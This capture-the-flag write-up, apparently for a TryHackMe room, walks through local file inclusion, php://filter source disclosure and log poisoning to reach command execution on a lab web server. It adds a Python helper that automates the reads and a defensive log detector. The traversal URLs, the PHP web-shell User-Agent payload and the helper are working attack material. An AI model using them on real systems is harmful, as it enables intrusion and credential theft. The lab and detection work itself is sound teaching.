# [Day 6] Patch Management Is Hard

## Challenge

Accessing the webserver returns the following.

![](/files/FstV2X0JZhiQ73ZSkoj5)

Inspecting the URL showed that the application loads the error message from a file named by the `err` query parameter, which makes that parameter the natural place to probe.

![](/files/J3qIjcj6HGPeINTAXVDz)

{% hint style="success" %}
Deploy the attached VM and look around. What is the entry point for our web application?

* err
{% endhint %}

Replacing the error file name with `/etc/passwd` returned that file and confirmed the LFI vulnerability. Pointing the same parameter at `/etc/flag` with a directory-traversal path reads the flag:

![](/files/u05Sxbvar4t7dpyxden6)

```
http://10.10.109.239/index.php?err=../../../../../etc/flag
```

![](/files/95VK1A3j6QwGAZe0wC1r)

{% hint style="success" %}
Use the entry point to perform LFI to read the /etc/flag file. What is the flag?

* THM{d29e08941cf7fe41df55f1a7da6c\*\*\*\*}
{% endhint %}

Next, to read the source code of a PHP file rather than have the include execute it, I used the `php://filter` wrapper with `convert.base64-encode`, which returns the file's bytes base64-encoded instead of running them:

```
http://10.10.109.239/index.php?err=php://filter/convert.base64-encode/resource=index.php
```

![](/files/KwEHoRbErU7UjLKRSv6Q)

Decoding the base64 value gave the source of `index.php`, which contained the next flag.

![](/files/YZwo0eWJOoA2QDOFMCCB)

{% hint style="success" %}
Use the PHP filter technique to read the source code of the index.php. What is the $flag variable's value?

* THM{791d43d46018a0d89361dbf60d5d\*\*\*\*}
{% endhint %}

The source code also referenced two other files, `creds.php` and `manage.php`.

`manage.php` redirects to `login.php`, which is where `creds.php` comes in handy. I used the same filter technique to read its contents:

```
http://10.10.103.198/index.php?err=php://filter/convert.base64-encode/resource=./includes/creds.php
```

![](/files/XC291WoptCIsFQ0Weten)

![](/files/8XbIGJWSHOjMqWP9EKQy)

```
<?php 
$USER = "McSkidy";
$PASS = "A0C315Aw3s0m";
?>
```

{% hint style="success" %}
Now that you read the index.php, there is a login credential PHP file's path. Use the PHP filter technique to read its content. What are the username and password?

* ```
  McSkidy:A0C315Aw3s0m
  ```

{% endhint %}
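As an added example (not the room's or this write-up's own code), here is a small Python helper that automates the two read steps above: build the traversal and `php://filter` URLs, decode the base64 body that comes back, and pull `$NAME = "value";` assignments out of the recovered source. `TARGET` and `PARAM` are assumptions copied from the URLs on the page, and the response body is constructed from the `creds.php` shown above so the decoding and extraction run offline.

```python
"""Helper for the path-traversal and php://filter steps of this write-up.

Added example, not the room's or the write-up's own code. TARGET and PARAM
are assumptions copied from the URLs on the page; CONSTRUCTED_RESPONSE is a
fake response body built from the creds.php shown above so that the decoding
and extraction can be exercised offline.
"""
import base64
import re
from urllib.parse import quote

TARGET = "http://10.10.103.198/index.php"   # assumed: the box used in the write-up
PARAM = "err"                               # the vulnerable include parameter


def traversal_url(target: str, path: str, depth: int = 5) -> str:
    """LFI URL for an absolute path on the server.

    depth is how many ../ are needed to climb from the include directory to /;
    five was enough on the room's box. Extra ../ past / are harmless, so err high.
    """
    payload = "../" * depth + path.lstrip("/")
    return f"{target}?{PARAM}={quote(payload, safe='/:=')}"


def filter_url(target: str, resource: str) -> str:
    """php://filter URL that returns the file base64-encoded.

    convert.base64-encode is the point: include() would otherwise *execute*
    a .php file and show only its output, never its source.
    """
    payload = f"php://filter/convert.base64-encode/resource={resource}"
    return f"{target}?{PARAM}={quote(payload, safe='/:=')}"


def decode_filter_output(body: str) -> str:
    """Find the base64 blob in a response body and decode it.

    The blob is wrapped in the page's own HTML, so take the longest run of
    base64 characters rather than the whole body.
    """
    blobs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", body)
    if not blobs:
        raise ValueError("no base64 blob found in response body")
    blob = max(blobs, key=len)
    blob += "=" * (-len(blob) % 4)          # repair stripped padding, if any
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def extract_php_vars(source: str) -> dict:
    """Collect simple $NAME = "value"; assignments (how creds.php and $flag are stored)."""
    pattern = re.compile(r"""\$(\w+)\s*=\s*(['"])(.*?)\2\s*;""")
    return {name: value for name, _q, value in pattern.findall(source)}


# Constructed response: the creds.php from the page, base64-encoded and
# wrapped in the kind of HTML index.php emits around the included file.
CONSTRUCTED_CREDS_PHP = '<?php \n$USER = "McSkidy";\n$PASS = "A0C315Aw3s0m";\n?>\n'
CONSTRUCTED_RESPONSE = (
    "<html><body><div class='error'>"
    + base64.b64encode(CONSTRUCTED_CREDS_PHP.encode()).decode()
    + "</div></body></html>"
)


def recover_creds(body: str = CONSTRUCTED_RESPONSE) -> dict:
    """Full step: decode the filter output and pull the credentials out of it."""
    return extract_php_vars(decode_filter_output(body))


if __name__ == "__main__":
    print(traversal_url(TARGET, "/etc/flag"))
    print(filter_url(TARGET, "./includes/creds.php"))
    print(recover_creds())
```

Against a live target you would fetch `filter_url(...)` with `requests` or `curl` and pass the body to `recover_creds`; the longest-base64-run heuristic is what keeps the surrounding HTML from breaking the decode.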

Logging into the Control System and accessing `Password Recovery` reveals the next flag.

![](/files/dJCSzM5vtjR4tegooroB)

{% hint style="success" %}
Use the credentials to login into the web application. Help McSkidy to recover the server's password. What is the password of the flag.thm.aoc server?

* THM{552f313b52e3c3dbf5257d8c6db7\*\*\*\*}
{% endhint %}

![](/files/QjRinMnk6ZkfZVIsvEu8)

Now that I could read the log file, knew where it was stored, and could write to it through ordinary web requests (every request's User-Agent is logged verbatim), I used log poisoning to get remote command execution on the server.

```
http://10.10.103.198/logs.php
```

![](/files/ubioLgiM6vdOX6lNueDm)

I first poisoned the log by sending a request with `curl`, setting a PHP payload as the User-Agent, as shown below. Once the log is included through the LFI, PHP executes the planted code, which runs whatever command is passed in the `cmd` parameter:

```
curl -A '<?php system($_GET["cmd"]); ?>' http://10.10.103.198/login.php
```

![](/files/jKVAB4ZwtnJljeyv7KeB)

Following that, I included the log file via the LFI and added a `cmd` parameter to the URL to run commands on the server:

```
http://10.10.103.198/index.php?err=./includes/logs/app_access.log&cmd=ls
```

![](/files/NpkNyOPfXmke1un6ihGw)

```
http://10.10.103.198/index.php?err=./includes/logs/app_access.log&cmd=hostname
```

![](/files/ZWo04ZByXpHAyLQKJkKR)

{% hint style="success" %}
The web application logs all users' requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at `./includes/logs/app_access.log`.

* lfi-aoc-awesome-59aedca683fff9261263bb084880c965
{% endhint %}
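The defender's view of the same chain, as an added example that is not part of the room or this write-up: a Python detector that scans access-log lines for the three stages seen above (traversal or `php://` wrappers in the include parameter, PHP tags planted in the User-Agent, and an include of the log file combined with a command parameter). It assumes the log is written in the Apache/nginx "combined" format, which the page does not state, and the sample lines are constructed to mirror the requests made on the page.

```python
"""Detection logic for the LFI and log-poisoning chain in this write-up.

Added example, not part of the original room or write-up. It scans access-log
lines in the Apache/nginx "combined" format (an assumption about how
app_access.log is written) for the stages seen on the page. The log lines at
the bottom are constructed to mirror the page's requests.
"""
import re
from urllib.parse import parse_qs, unquote, urlparse

# combined format; quoted fields may contain Apache-style \" and \xHH escapes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
PHP_TAG_RE = re.compile(r"<\?(php\b|=)", re.IGNORECASE)
WRAPPER_RE = re.compile(r"^(php|data|expect|phar|zip|glob)://", re.IGNORECASE)


def unescape_log_field(field: str) -> str:
    # Undo Apache's escaping of quoted fields: \" \\ \xHH \n \r \t
    def repl(m):
        esc = m.group(1)
        if esc[0] == "x":
            return chr(int(esc[1:], 16))
        return {"n": "\n", "r": "\r", "t": "\t"}.get(esc, esc)
    return re.sub(r"\\(x[0-9a-fA-F]{2}|.)", repl, field)


def query_params(target: str) -> dict:
    """Query string as {name: [values]}, URL-decoded twice to catch %252e%252e%252f."""
    raw = parse_qs(urlparse(target).query, keep_blank_values=True)
    return {k: [unquote(unquote(v)) for v in vals] for k, vals in raw.items()}


def check_line(line: str):
    """Return a list of (rule, detail) findings for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return [("unparsed", line)]
    params = query_params(m["target"])
    ua = unescape_log_field(m["ua"])
    findings = []
    for name, values in params.items():
        for v in values:
            if "../" in v or "..\\" in v:
                findings.append(("traversal", f"{name}={v}"))
            elif WRAPPER_RE.match(v):
                findings.append(("php_wrapper", f"{name}={v}"))
    if PHP_TAG_RE.search(ua):
        findings.append(("log_poisoning", f"User-Agent: {ua}"))
    # include of a log file plus a command-style parameter: the RCE trigger
    if "cmd" in params and any(v.lower().endswith(".log") for vs in params.values() for v in vs):
        findings.append(("rce_trigger", m["target"]))
    return findings


def scan(lines):
    """Run check_line over a log and tag each finding with line number and client IP."""
    results = []
    for n, line in enumerate(lines, 1):
        ip = line.split(" ", 1)[0]
        for rule, detail in check_line(line):
            results.append({"line": n, "ip": ip, "rule": rule, "detail": detail})
    return results


# Constructed sample log mirroring the requests made in the write-up.
CONSTRUCTED_LOG = [
    r'10.9.1.5 - - [06/Dec/2021:10:00:01 +0000] "GET /index.php?err=error.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    r'10.9.1.5 - - [06/Dec/2021:10:00:07 +0000] "GET /index.php?err=../../../../../etc/flag HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    r'10.9.1.5 - - [06/Dec/2021:10:00:15 +0000] "GET /index.php?err=php://filter/convert.base64-encode/resource=./includes/creds.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    r'10.9.1.5 - - [06/Dec/2021:10:00:30 +0000] "GET /login.php HTTP/1.1" 200 1024 "-" "<?php system($_GET[\"cmd\"]); ?>"',
    r'10.9.1.5 - - [06/Dec/2021:10:00:41 +0000] "GET /index.php?err=./includes/logs/app_access.log&cmd=hostname HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(CONSTRUCTED_LOG):
        print(f"line {f['line']} {f['ip']} {f['rule']}: {f['detail']}")
```

The escape handling matters in practice: Apache writes the payload's embedded quotes as `\"`, so a naive `"[^"]*"` field regex silently drops exactly the line that carries the poison. Feed the real `app_access.log` to `scan()` to apply the same rules.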
